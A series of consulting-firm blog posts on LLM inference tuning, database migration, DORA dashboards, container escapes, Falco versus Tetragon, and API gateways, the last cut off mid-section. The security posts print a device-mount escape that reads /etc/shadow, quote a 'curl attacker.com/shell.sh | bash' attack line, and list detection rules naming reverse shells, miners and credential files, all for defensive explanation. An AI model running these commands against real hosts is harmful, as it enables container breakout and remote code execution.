Impact: 1.5-2.5x speedup for generation-heavy workloads. The speedup is highest when the output is predictable (common language patterns, structured data) and lowest for creative/novel outputs.

Combining All Three

The techniques stack. Here's the configuration we use for a production chatbot serving 10K requests/hour:

llm = LLM(
    model="TheBloke/Llama-3-70B-AWQ",     # INT4 quantization
    quantization="awq",
    speculative_model="TheBloke/Llama-3-8B-AWQ",  # Quantized draft
    num_speculative_tokens=5,
    tensor_parallel_size=2,                 # 2x A100 40GB
    max_num_batched_tokens=32768,           # Continuous batching
    max_num_seqs=256,
)

Results vs naive FP16 serving:

Throughput: 12 req/s → 89 req/s (7.4x)
P50 latency: 2.1s → 0.4s (5.2x faster)
GPU cost: 4x A100 80GB → 2x A100 40GB (60% cost reduction)
Quality: <2% regression on MMLU benchmark

Common Mistakes

Before diving into infrastructure recommendations, avoid these pitfalls we've seen repeatedly:

Quantizing without benchmarking on YOUR data. Generic benchmarks (MMLU, HumanEval) don't reflect your use case. A model that scores well on academic benchmarks might hallucinate on your domain-specific queries after quantization. Always evaluate on a test set from your actual production traffic.
Using speculative decoding for creative tasks. Speculative decoding works best when the output is predictable — structured data, common language patterns, templated responses. For creative writing or novel reasoning, the draft model's predictions are wrong more often, reducing the speedup to near zero.
Ignoring cold start latency. vLLM's first request after loading a model takes 5-10x longer than subsequent requests due to CUDA kernel compilation. If your traffic is bursty, keep models warm with synthetic heartbeat requests.
Over-optimizing throughput at the expense of latency. Increasing batch size improves throughput but hurts tail latency. For interactive applications (chatbots, autocomplete), optimize for P95 latency first, then tune throughput.

Infrastructure Recommendations

For Startups (< $5K/month inference budget)

Use vLLM with AWQ quantization on a single A100 40GB
Start with Llama-3-8B-AWQ — surprisingly capable for most use cases
Add speculative decoding if latency matters more than throughput
Monitor with Prometheus — track tokens/second, queue depth, and P95 latency

For Mid-Market ($5K-$50K/month)

vLLM cluster with continuous batching and tensor parallelism
A/B test INT8 vs INT4 quantization for your specific use case
Implement request routing: simple queries to 8B model, complex to 70B
Add semantic caching (Redis + embeddings) for repeated queries — cuts 30-40% of inference calls

For Enterprise ($50K+/month)

Triton Inference Server for multi-model serving and advanced scheduling
Custom quantization calibrated on your domain data
Speculative decoding with fine-tuned draft models
Multi-region deployment with intelligent routing based on model availability and latency

Need help optimizing your LLM inference costs? We've deployed inference stacks that serve millions of requests at a fraction of the typical cost. Book a consultation or explore our AI infrastructure services.

Zero-Downtime Database Migration: Shadow Writes, Dual-Read, and the 12-Second Cutover

Yash Pritwani — Thu, 07 May 2026 06:00:07 +0000

Originally published on TechSaaS Cloud

Zero-Downtime Database Migration: Shadow Writes, Dual-Read, and the 12-Second Cutover

Database migrations are the scariest infrastructure change you can make. Your data is the one thing you absolutely cannot lose, corrupt, or make unavailable.

We migrated a 2TB PostgreSQL database to CockroachDB for a SaaS client with zero downtime, zero data loss, and a cutover that took 12 seconds. Here's the complete playbook.

Why Not Just pg_dump and Restore?

For a 2TB database, pg_dump takes roughly 4-8 hours depending on your hardware. During that time, your application is either down or writing data that won't be in the dump. You'd need a maintenance window, and for a SaaS product with global users, "maintenance windows" mean lost revenue and broken SLAs.

The shadow-write approach eliminates the maintenance window entirely.

Phase 1: Dual-Write Setup

The core idea: write every mutation to BOTH the old database (Postgres) and the new database (CockroachDB) simultaneously.

class DualWriteMiddleware:
    def __init__(self, primary_db, shadow_db):
        self.primary = primary_db    # Postgres (source of truth)
        self.shadow = shadow_db      # CockroachDB (catching up)

    async def execute_write(self, query, params):
        # Primary write — this is the source of truth
        result = await self.primary.execute(query, params)

        # Shadow write — async, failures logged but don't affect user
        try:
            await asyncio.wait_for(
                self.shadow.execute(query, params),
                timeout=5.0
            )
        except Exception as e:
            log.warning(f"Shadow write failed: {e}")
            self.shadow_failure_queue.append((query, params))

        return result

Key rules:

Primary database (Postgres) is always the source of truth
Shadow writes are fire-and-forget — failures are logged and retried, never shown to users
A failure queue captures any shadow writes that fail, for replay later

Duration: We ran dual-write for 2 weeks before moving to Phase 2.

Phase 2: Historical Data Migration

While dual-writes handle new data, you need to backfill historical data. We used a chunked migration approach:

# Migrate in 10,000-row chunks with checkpointing
python migrate.py \
  --source postgres://prod-primary:5432/app \
  --target cockroach://cockroach-cluster:26257/app \
  --table orders \
  --chunk-size 10000 \
  --checkpoint-file /tmp/migration-orders.checkpoint

The checkpoint file tracks the last migrated primary key, so you can restart the migration without re-processing. For a 2TB database, this took about 18 hours running at low priority (to avoid impacting production reads).

Phase 3: Shadow-Read Validation

This is where most migration guides stop, and where most migrations fail. Before cutting over reads, you need to validate that CockroachDB returns the same results as Postgres.

class ShadowReadValidator:
    async def validate_read(self, query, params):
        # Read from both
        primary_result = await self.primary.execute(query, params)
        shadow_result = await self.shadow.execute(query, params)

        # Compare
        if primary_result != shadow_result:
            log.error(f"READ MISMATCH: query={query}")
            log.error(f"  Postgres: {primary_result[:100]}")
            log.error(f"  CockroachDB: {shadow_result[:100]}")
            self.mismatch_counter.inc()

        # Always return primary result
        return primary_result

We ran shadow-read validation on 10% of production read traffic for one week. Results:

47 query incompatibilities found (mostly around timestamp precision and JSON operator differences)
3 data mismatches (all from shadow-write failures that hadn't been replayed yet)
0 correctness bugs in CockroachDB itself

Each incompatibility was fixed by updating the application query or adding a compatibility layer. This validation phase is the most valuable part of the entire migration — it catches problems before they affect users.

Phase 4: Traffic Shifting

Once shadow-reads show zero mismatches for 48 hours, gradually shift read traffic:

# Feature flag configuration
database_read_routing:
  cockroach_percentage: 5     # Start at 5%
  escalation_schedule:
    - after: 24h → 20%
    - after: 24h → 50%
    - after: 24h → 80%
    - after: 24h → 100%
  rollback_trigger:
    error_rate_threshold: 0.1%
    latency_p99_threshold: 500ms

At each stage, monitor:

Error rates (should be identical or better)
Latency p50/p95/p99 (CockroachDB was 15% faster for our read patterns)
Data consistency (shadow-read mismatches should stay at 0)

Phase 5: The 12-Second Cutover

Once 100% of reads are going to CockroachDB successfully:

Stop dual-writes (Postgres stops receiving new data)
Drain any remaining shadow-write failure queue
Final consistency check (compare row counts, checksums on critical tables)
Update connection strings to point to CockroachDB
Restart application pools

Steps 1-5 took 12 seconds in our case. The application experienced zero errors during cutover because reads were already going to CockroachDB.

Post-Migration

Keep Postgres running in read-only mode for 30 days as a safety net. If anything goes wrong, you can revert by switching connection strings back. After 30 days with no issues, decommission the Postgres instance.

Lessons Learned

Shadow-read validation catches 95% of migration bugs. Don't skip it.
The failure queue is critical. Without it, your shadow database will have data gaps.
Run dual-write for at least 2 weeks. One week isn't enough to catch all edge cases.
Monitor CockroachDB performance during the migration. Backfilling 2TB while handling dual-writes is a significant load.
Test rollback before you need it. We practiced the rollback procedure three times before the actual migration.

Planning a database migration? We've done zero-downtime migrations for databases from 100GB to 5TB. Book a consultation or explore our infrastructure services.

DORA Metrics: A Platform Engineering Dashboard

Yash Pritwani — Wed, 06 May 2026 19:07:10 +0000

Originally published on TechSaaS Cloud

title: "DORA Metrics for Platform Engineering: What Your Dashboard Should Actually Measure"
slug: dora-metrics-platform-engineering-dashboard
category: Platform Engineering
tags: [DORA Metrics, Platform Engineering, Developer Productivity, DevOps, SRE]
seo_title: "DORA Metrics Guide 2026: Platform Engineering Dashboard That Works"
meta_description: "Why most DORA metrics dashboards are misleading and how to build one that actually drives improvement. Covers deployment frequency, lead time, MTTR, and change failure rate with Grafana examples."

estimated_read_time: 10

DORA Metrics for Platform Engineering: What Your Dashboard Should Actually Measure

Every platform engineering team has a DORA metrics dashboard. Most of them are lying.

Deployment frequency of 47/day looks great until you realize 40 of those are config changes to a feature flag service. Lead time of 2 hours looks fast until you realize it's measuring time from merge to deploy, not time from first commit to production.

Here's how to build a DORA dashboard that actually tells you something useful.

The Four Metrics (And What They Actually Mean)

1. Deployment Frequency

What people measure: COUNT(deployments) / time
What you should measure: COUNT(meaningful_deployments) / time

A meaningful deployment changes user-facing behavior. Config changes, dependency bumps, and CI fixes don't count.

# Bad: counts everything
sum(increase(deployments_total[24h]))

# Better: filter by deployment type
sum(increase(deployments_total{type="feature"}[24h]))
+ sum(increase(deployments_total{type="bugfix"}[24h]))

2. Lead Time for Changes

What people measure: Merge to deploy
What you should measure: First commit to production traffic

The time from a developer's first commit to when real users hit the new code. This captures code review wait time, CI queue time, staging validation, and rollout duration — all the friction your platform creates.

# Capture the full pipeline
histogram_quantile(0.50,
  sum(rate(lead_time_seconds_bucket{
    stage="first_commit_to_production"
  }[7d])) by (le)
)

3. Change Failure Rate

What people measure: failed_deploys / total_deploys
What you should measure: deploys_causing_degradation / total_deploys

A deployment that fails CI and never reaches production isn't a change failure — it's CI working correctly. A deployment that passes everything but causes a 10% error rate spike IS a change failure.

4. Mean Time to Recovery (MTTR)

What people measure: Time from alert to resolution
What you should measure: Time from user impact to user recovery

If your alerting has 15 minutes of lag, your MTTR looks 15 minutes better than reality. Measure from the moment error rates spike, not from when PagerDuty fires.

The Dashboard That Works

Panel 1: Weekly Deployment Velocity

Line chart: deployments per week, split by type (feature, bugfix, infra)
Exclude: config changes, dependency updates, CI fixes
Annotation: mark release freezes, incidents, holidays

Panel 2: Lead Time Distribution

Heatmap: lead time buckets (hours) over past 30 days
Show p50, p75, p95 — not just average
Split by team if multi-team org

Panel 3: Change Failure Rate Trend

Stacked bar: successful deploys vs. failure-causing deploys per week
Overlay: change failure rate as percentage line
Alert threshold at 15% (DORA "high" performer benchmark)

Panel 4: MTTR by Severity

Bar chart: average MTTR split by incident severity (SEV1-4)
Include: detection time, triage time, fix time, verification time
Goal lines: SEV1 < 1hr, SEV2 < 4hr, SEV3 < 24hr

Panel 5: Platform Health Score

Composite metric combining all four DORA metrics into a single score:

score = (
  normalize(deployment_freq, target=daily) * 0.25 +
  normalize(1/lead_time_hours, target=24h) * 0.25 +
  normalize(1-change_failure_rate, target=0.85) * 0.25 +
  normalize(1/mttr_hours, target=1h) * 0.25
)

Common Anti-Patterns

1. Gaming the Metrics

Teams split PRs into tiny changes to inflate deployment frequency. Fix: measure feature completion rate alongside deployment frequency.

2. Measuring Teams Against Each Other

DORA metrics are for teams to improve themselves, not for management to rank teams. Different services have legitimately different deployment profiles.

3. Ignoring Context

A team with 0 deployments during a security incident investigation isn't underperforming — they're doing the right thing. Always annotate metric dashboards with context.

4. Snapshot Obsession

Looking at this week's numbers in isolation tells you nothing. The trend over 3-6 months is what matters.

Implementation: Data Sources for Real DORA

The metrics above are only as good as the data feeding them. Here's where to get each metric:

Deployment Frequency:

Source: CI/CD pipeline events (GitHub Actions webhook, ArgoCD notifications, Flux alerts)
Label each deployment with type: feature, bugfix, config, dependency, infra
Push to Prometheus via pushgateway or use a deployment tracker service

Lead Time:

Source: Git events (first commit timestamp) + deployment events (production rollout timestamp)
Calculate: production_deploy_time - first_commit_time for each PR/branch
Tools: LinearB, Sleuth, or custom webhook that tracks PR lifecycle

Change Failure Rate:

Source: Incident tracking (PagerDuty, Opsgenie) correlated with deployment events
Logic: if incident starts within 1 hour of deployment AND affects the deployed service, count as change failure
This correlation is the hardest part — most teams get it wrong because they don't link incidents to deploys

MTTR:

Source: Monitoring (Prometheus alertmanager) for impact start, incident tracker for resolution
Measure from first error rate spike (detected by anomaly detection), not from alert firing
Include: detection lag, triage time, fix time, verification time as separate sub-metrics

SPACE Framework: Beyond DORA

DORA measures delivery performance. SPACE (from Microsoft Research) adds developer experience:

Satisfaction and well-being (quarterly survey, eNPS score)
Performance (DORA metrics as described above)
Activity (commits, PRs, reviews — use carefully, never as productivity proxy)
Communication and collaboration (PR review turnaround, async response time)
Efficiency and flow (focus time from calendar analysis, context switches from tool telemetry)

The combination of DORA (system performance) + SPACE (human experience) gives you the full picture. A team with elite DORA metrics but 30% satisfaction is one resignation away from collapse.

Our Recommendation

Start with just two metrics: deployment frequency (filtered by type) and change failure rate. These are the easiest to instrument and the most actionable. Add lead time once you have the data pipeline working. Add MTTR when you have incident tracking mature enough to correlate with deploys.

The dashboard is not the goal. The goal is a team that ships faster with fewer failures. The dashboard just makes the trend visible so you can have evidence-based conversations about where to invest in your platform.

Want help building a DORA metrics dashboard that actually drives improvement? Book a free platform engineering consultation or explore our DevOps services.

Container Escape Vulnerabilities in 2026: runc, cgroups, and Kernel Capabilities

Yash Pritwani — Wed, 06 May 2026 13:22:28 +0000

Originally published on TechSaaS Cloud

title: "Container Escape Vulnerabilities in 2026: runc, cgroups, and Kernel Capabilities"
slug: container-escape-vulnerabilities-runc-cgroups-2026
category: Security
tags: [Container Security, Docker, Kubernetes, Runtime Security, DevSecOps]
seo_title: "Container Escape Vulnerabilities 2026: runc, cgroups, Kernel Exploits"
meta_description: "Three container escape vectors that work in 2026: runc CVEs, cgroup misconfigurations, and Linux capability leaks. Detection methods and hardening guide."

estimated_read_time: 11

Container Escape Vulnerabilities in 2026: What Still Works and How to Defend

Containers are not VMs. The isolation boundary is thinner than most engineers realize — a shared kernel, a set of namespaces, and some cgroup limits. When any of these layers has a bug or misconfiguration, an attacker inside a container can reach the host.

Here are three escape vectors that remain viable in 2026, and how to defend against each.

Vector 1: runc CVEs — The Runtime Layer

runc is the OCI container runtime that Docker and Kubernetes use under the hood. When runc has a vulnerability, every container on the host is at risk.

CVE History That Matters

CVE-2024-21626 (Leaky File Descriptors): runc leaked file descriptors into containers, allowing an attacker to access the host filesystem through /proc/self/fd/. Any container image could exploit this on first run.
CVE-2019-5736 (runc overwrite): A malicious container could overwrite the host runc binary, gaining code execution on the host when any container next starts.

These aren't theoretical. CVE-2024-21626 was exploitable with a single WORKDIR instruction in a Dockerfile.

Defense

# Check your runc version
runc --version
# Must be >= 1.1.14 (patches CVE-2024-21626)

# Use a hardened runtime instead
# gVisor (application kernel — no shared kernel)
# Kata Containers (lightweight VM — true isolation)

For high-security workloads, replace runc entirely:

# Kubernetes RuntimeClass for gVisor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
spec:
  runtimeClassName: gvisor
  containers:
  - name: untrusted-workload
    image: myapp:latest

Vector 2: cgroup Misconfiguration — The Resource Layer

cgroups limit what resources a container can use. But they also control access to devices, and misconfigurations can expose the host.

The Device Access Escape

If a container has access to the host's block devices (e.g., /dev/sda), it can mount the host filesystem directly:

# Inside a misconfigured container with device access
mkdir /tmp/host
mount /dev/sda1 /tmp/host
# Now you have full read/write access to the host filesystem
cat /tmp/host/etc/shadow

This happens when containers run with --privileged or when device cgroup rules are too permissive.

The cgroup Escape (CVE-2022-0492)

A bug in cgroup v1's release_agent mechanism allowed a container process to write to the host's cgroup filesystem and execute arbitrary commands on the host.

Defense

# Kubernetes PodSecurityStandard — enforce "restricted" profile
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted

Specific hardening:

Never run privileged containers in production. If a vendor requires --privileged, that's a red flag.
Use cgroup v2 — it has a fundamentally more secure design than v1.
Drop all capabilities and add back only what's needed:

securityContext:
  capabilities:
    drop: ["ALL"]
    add: ["NET_BIND_SERVICE"]  # Only if needed

Vector 3: Linux Capability Leaks — The Kernel Layer

Linux capabilities split root privileges into smaller chunks. But some capabilities are dangerous enough to enable container escapes on their own.

The Dangerous Capabilities

Capability	Why It's Dangerous
`CAP_SYS_ADMIN`	Mount filesystems, change namespaces — nearly equivalent to root
`CAP_SYS_PTRACE`	Trace any process — can inject code into host processes via /proc
`CAP_NET_RAW`	Raw sockets — enables ARP spoofing, traffic interception
`CAP_DAC_OVERRIDE`	Bypass file permission checks — read any file
`CAP_SYS_MODULE`	Load kernel modules — direct kernel code execution

Docker's default capability set includes CAP_NET_RAW and several others that most applications don't need.

Defense: Minimal Capability Set

# In your Dockerfile — run as non-root
RUN adduser --disabled-password --gecos '' appuser
USER appuser

# In Kubernetes — drop all, add none
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop: ["ALL"]

Detection: Runtime Monitoring

Use Falco or Tetragon to detect escape attempts in real-time:

# Falco rule — detect mount from container
- rule: Container Mounted Host Path
  desc: Detect container attempting to mount host filesystem
  condition: >
    evt.type = mount and container.id != host
    and not mount.source startswith "/var/lib/docker"
  output: "Container escape attempt via mount (container=%container.name)"
  priority: CRITICAL

The Defense-in-Depth Stack

No single defense is sufficient. Layer them:

Build time: Scan images with Trivy/Grype, reject images running as root
Admission: Kubernetes PodSecurityStandards set to "restricted"
Runtime: Drop ALL capabilities, use read-only root filesystem
Detection: Falco or Tetragon monitoring for suspicious syscalls
Isolation: gVisor or Kata Containers for untrusted workloads
Patching: Automated runc/containerd updates within 48 hours of CVE disclosure

Quick Audit

Run this against your cluster to find the most obvious issues:

# Find privileged containers
kubectl get pods -A -o json | jq -r '
  .items[] | select(.spec.containers[].securityContext.privileged == true)
  | "\(.metadata.namespace)/\(.metadata.name)"'

# Find containers running as root
kubectl get pods -A -o json | jq -r '
  .items[] | select(.spec.containers[].securityContext.runAsNonRoot != true)
  | "\(.metadata.namespace)/\(.metadata.name)"'

# Find containers with dangerous capabilities
kubectl get pods -A -o json | jq -r '
  .items[] | select(.spec.containers[].securityContext.capabilities.add
  | . != null and (. | inside(["SYS_ADMIN","SYS_PTRACE","NET_RAW"])))
  | "\(.metadata.namespace)/\(.metadata.name)"'

Need a container security audit? We perform comprehensive runtime security assessments and help teams harden their Kubernetes deployments. Book a security consultation or explore our DevSecOps services.

Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security

Yash Pritwani — Wed, 06 May 2026 06:00:05 +0000

Originally published on TechSaaS Cloud

Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security

Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.

Detection without enforcement is just expensive logging.

Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.

How They Actually Work

Both tools use eBPF, but in very different ways.

Falco hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a detection tool -- it tells you something happened.

Tetragon hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take enforcement actions inline -- before the syscall returns to userspace. It can send SIGKILL to a process, override a syscall return value, or throttle file access. The process doesn't get to finish what it started.

The architectural difference:

Falco:    syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert

That "human decides" gap in the Falco pipeline? That's where breaches happen.

Setting Up Falco for Real Detection

Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:

# falco-custom-rules.yaml
- rule: Reverse Shell Detected
  desc: Detect reverse shell connections from containers
  condition: >
    spawned_process and
    container and
    ((proc.name in (bash, sh, dash, zsh)) and
     (fd.type = ipv4 or fd.type = ipv6) and
     fd.direction = out)
  output: >
    Reverse shell detected (container=%container.name
    command=%proc.cmdline connection=%fd.name
    user=%user.name image=%container.image.repository)
  priority: CRITICAL
  tags: [network, process, attack]

- rule: Crypto Miner Binary
  desc: Known crypto mining process names
  condition: >
    spawned_process and container and
    proc.name in (xmrig, minerd, minergate, cpuminer, 
                  kdevtmpfsi, kinsing)
  output: >
    Crypto miner detected (container=%container.name 
    process=%proc.name image=%container.image.repository)
  priority: CRITICAL
  tags: [process, crypto, attack]

- rule: Sensitive File Read in Container
  desc: Reading sensitive files that containers shouldn't touch
  condition: >
    open_read and container and
    (fd.name startswith /etc/shadow or
     fd.name startswith /etc/kubernetes/pki or
     fd.name startswith /run/secrets/kubernetes.io)
  output: >
    Sensitive file read (file=%fd.name container=%container.name
    command=%proc.cmdline)
  priority: WARNING
  tags: [filesystem, sensitive]

Deploy with Helm:

helm install falco falcosecurity/falco \
  --namespace falco-system --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.alertmanager.hostport="http://alertmanager:9093" \
  --set-file falco.rules_file[0]=/path/to/falco-custom-rules.yaml

Setting Up Tetragon for Enforcement

Now the enforcement side. Tetragon uses TracingPolicy custom resources to define what to monitor and how to respond:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: kill-reverse-shells
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
                - /bin/dash
                - /usr/bin/bash
                - /usr/bin/sh
          matchActions:
            - action: Sigkill
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"

This policy says: if bash, sh, or dash attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.

A more nuanced policy for file access:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: protect-sensitive-files
spec:
  kprobes:
    - call: "security_file_open"
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
            - index: 0
              operator: Prefix
              values:
                - /etc/shadow
                - /etc/kubernetes/pki
          matchActions:
            - action: Sigkill
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"

Deploy Tetragon:

helm install tetragon cilium/tetragon \
  --namespace kube-system \
  --set tetragon.exportFilename=/var/run/cilium/tetragon/tetragon.log \
  --set tetragon.enablePolicyFilter=true \
  --set tetragon.enableMsgHandlingLatency=true

Real Attack Scenario: The Compromised npm Package

Let's walk through a realistic attack and see how each tool responds.

The attack: A developer installs a compromised npm package that, on import, spawns a child process running curl attacker.com/shell.sh | bash.

Falco response:

Detects bash spawned as child of node (rule: "Shell Spawned by Non-Shell Program")
Detects outbound network connection from bash (rule: "Reverse Shell Detected")
Sends alert to Slack + Alertmanager
Total time from exploit to alert: ~800ms
Total time from exploit to human response: 3-47 minutes (depending on alerting pipeline and on-call response)
The shell has been running the entire time

Tetragon response:

bash spawned as child of node -- logged but allowed (process spawn is legitimate in many apps)
bash attempts TCP connection -- SIGKILL sent in ~3 microseconds
Process dies. Connection never established.
Event exported for audit trail
Total time from exploit to containment: <1ms

The attacker got nothing. Not a single byte of data exfiltrated.

Performance Impact

Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):

Metric	No security	Falco	Tetragon	Both
CPU overhead (per node)	baseline	+1.8%	+0.9%	+2.5%
Memory overhead (per node)	baseline	+180MB	+95MB	+260MB
Syscall latency (p99)	baseline	+2.1μs	+0.8μs	+2.7μs
Network latency (p99)	baseline	+0.3μs	+0.2μs	+0.4μs

Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.

Both tools are light enough to run simultaneously without meaningful production impact.

When to Use Which (Or Both)

Use Falco when:

You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)
You want visibility into container behavior before writing enforcement policies
Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)
You're just starting with runtime security and need to understand your baseline

Use Tetragon when:

You know what should never happen and want to prevent it, not just detect it
You need sub-millisecond response to threats
You're running Cilium for networking (Tetragon integrates natively)
You want enforcement at the kernel level without a userspace bottleneck

Use both when:

You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious
Compliance requires both prevention and audit trails
You're running a high-security workload (financial services, healthcare)

Our Recommended Architecture

For most production Kubernetes clusters, we deploy both:

┌─────────────────────────────────────────────┐
│ Kernel Level                                │
│  Tetragon eBPF → ENFORCE known threats      │
│  Falco eBPF    → DETECT suspicious activity │
└──────────────┬──────────────┬───────────────┘
               │              │
        ┌──────▼──────┐ ┌────▼──────────┐
        │ Tetragon    │ │ Falco         │
        │ Export JSON  │ │ Sidekick      │
        └──────┬──────┘ └────┬──────────┘
               │              │
        ┌──────▼──────────────▼───────────┐
        │ Loki / Elasticsearch            │
        │ (unified security event store)  │
        └──────────────┬──────────────────┘
                       │
        ┌──────────────▼──────────────────┐
        │ Grafana Dashboards + Alerts     │
        └─────────────────────────────────┘

Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).

The Migration Path

If you're running Falco today and considering Tetragon:

Deploy Tetragon in observe-only mode (no Sigkill actions) alongside Falco
Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.
Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)
Gradually move more rules to enforcement as confidence grows
Keep Falco for detection of novel threats that don't match enforcement patterns

Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.

Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. Get in touch if you want to stop detecting breaches and start preventing them.

API Gateway Patterns: Kong vs Envoy vs Traefik in 2025

Yash Pritwani — Tue, 05 May 2026 06:00:04 +0000

Originally published on TechSaaS Cloud

The API Gateway Role

An API gateway sits between clients and your backend services. It handles cross-cutting concerns so your services do not have to: authentication, rate limiting, request routing, load balancing, caching, and observability.

WebMobileIoTGatewayRate LimitAuthLoad BalanceTransformCacheService AService BService CDB / Cache

API gateway pattern: a single entry point handles auth, rate limiting, and routing to backend services.

Without an API gateway, every service implements its own auth middleware, rate limiter, and logging. With one, you centralize these concerns.

The Three Contenders

Kong: The Full-Featured Gateway

Kong started as an Nginx-based API gateway and evolved into a comprehensive API management platform. It is the most feature-rich option.

# Kong with Docker Compose
services:
  kong-database:
    image: postgres:16
    environment:
      POSTGRES_DB: kong
      POSTGRES_USER: kong
      POSTGRES_PASSWORD: secret

  kong:
    image: kong:3.8
    environment:
      KONG_DATABASE: postgres
      KONG_PG_HOST: kong-database
      KONG_PG_USER: kong
      KONG_PG_PASSWORD: secret
      KONG_PROXY_LISTEN: 0.0.0.0:8000
      KONG_ADMIN_LISTEN: 0.0.0.0:8001
    ports:
      - "8000:8000"
      - "8001:8001"

Kong route configuration:

# Create a service
curl -i -X POST http://localhost:8001/services/ \
  --data name=user-service \
  --data url=http://user-api:3000

# Create a route
curl -i -X POST http://localhost:8001/services/user-service/routes \
  --data paths[]=/api/users \
  --data strip_path=false

# Add rate limiting plugin
curl -i -X POST http://localhost:8001/services/user-service/plugins \
  --data name=rate-limiting \
  --data config.minute=100 \
  --data config.policy=local

# Add JWT authentication
curl -i -X POST http://localhost:8001/services/user-service/plugins \
  --data name=jwt

Envoy: The Programmable Proxy

Envoy is a high-performance L4/L7 proxy designed for cloud-native architectures. It is the data plane for Istio and many other service meshes.

# envoy.yaml
static_resources:
  listeners:
    - name: main
      address:
        socket_address:
          address: 0.0.0.0
          port_value: 8080
      filter_chains:
        - filters:
            - name: envoy.filters.network.http_connection_manager
              typed_config:
                "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
                stat_prefix: ingress
                route_config:
                  name: local_route
                  virtual_hosts:
                    - name: api
                      domains: ["api.example.com"]
                      routes:
                        - match:
                            prefix: "/api/users"
                          route:
                            cluster: user-service
                        - match:
                            prefix: "/api/orders"
                          route:
                            cluster: order-service
                            retry_policy:
                              retry_on: "5xx"
                              num_retries: 3
                http_filters:
                  - name: envoy.filters.http.router
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router

  clusters:
    - name: user-service
      connect_timeout: 5s
      type: STRICT_DNS
      load_assignment:
        cluster_name: user-service
        endpoints:
          - lb_endpoints:
              - endpoint:
                  address:
                    socket_address:
                      address: user-api
                      port_value: 3000

Traefik: The Docker-Native Gateway

Traefik auto-discovers services from Docker, Kubernetes, and other providers. No config files needed — just labels.

# Service with Traefik labels
services:
  user-api:
    image: user-api:latest
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.user-api.rule=Host(`api.example.com`) && PathPrefix(`/api/users`)"
      - "traefik.http.routers.user-api.entrypoints=web"
      - "traefik.http.services.user-api.loadbalancer.server.port=3000"
      # Rate limiting middleware
      - "traefik.http.middlewares.user-ratelimit.ratelimit.average=100"
      - "traefik.http.middlewares.user-ratelimit.ratelimit.burst=50"
      - "traefik.http.routers.user-api.middlewares=user-ratelimit"

Feature Comparison

Feature	Kong	Envoy	Traefik
Config method	Admin API / DB	YAML / xDS API	Docker labels / YAML
Service discovery	DNS, Consul	DNS, EDS	Docker, K8s, Consul
Rate limiting	Plugin (built-in)	Filter (built-in)	Middleware (built-in)
Authentication	JWT, OAuth2, LDAP, mTLS	JWT, ext_authz	ForwardAuth, BasicAuth
Load balancing	Round-robin, hash, least-conn	6+ algorithms	Round-robin, WRR
Circuit breaking	Plugin	Built-in	Built-in
WebSocket	Yes	Yes	Yes
gRPC	Yes	Native	Yes
WASM extensibility	No	Yes	No
Plugin ecosystem	100+ plugins	WASM + Lua filters	Middlewares + plugins
Memory footprint	~200MB (+DB)	~50MB	~30MB
Config complexity	Medium	High	Low
Dashboard	Kong Manager (paid)	No (use Kiali)	Built-in (free)

Internet🌐ReverseProxyTLS terminationLoad balancingPath routingRate limitingapp.example.comapi.example.comcdn.example.comHTTPS:3000:8080:9000

A reverse proxy terminates TLS, routes requests by hostname, and load-balances across backend services.

API Gateway Patterns

Pattern 1: Backend for Frontend (BFF)

Route different clients to different backend compositions:

Mobile App  → /mobile/*  → Mobile BFF → [User, Order, Payment]
